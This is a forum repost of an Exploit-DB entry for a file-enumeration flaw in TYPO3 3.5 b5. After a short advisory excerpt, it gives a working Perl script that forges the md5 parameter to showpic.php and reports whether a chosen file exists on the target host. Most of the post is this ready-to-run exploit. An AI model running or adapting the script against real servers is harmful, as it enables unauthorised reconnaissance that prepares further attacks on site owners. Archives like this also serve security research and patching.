Exploit Typo3 3.5 b5 - 'showpic.php' File Enumeration

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22297
Проверка EDB
  1. Пройдено
Автор
MARTIN EISZNER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2003-02-28
Код:
source: https://www.securityfocus.com/bid/6982/info

TYPO3 is prone to a vulnerability that will allow remote attackers to enumerate whether or not files exist on the system hosting the software. This issue exists in the 'showpic.php' and 'thumbs.php' scripts. This type of information may be useful in mounting further attacks against the host system. 

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use Digest::MD5 qw(md5_hex);
($ho,$fi) = @ARGV;
$md5 = md5_hex("$fi||||");
$ua = new LWP::UserAgent(); $ua->agent("Opera 6.0");
$uri = "http://".$ho."/typo3/showpic.php?file=$fi&md5=$md5";
$req = HTTP::Request->new("GET",$uri);
$res = $ua->request($req);
if ($res->content !~ /was not found/ && $res->content !~ /No valid/) {print "\n$fi exists\n";}
else {print "\n$fi not found\n";}
 
Источник
www.exploit-db.com

Похожие темы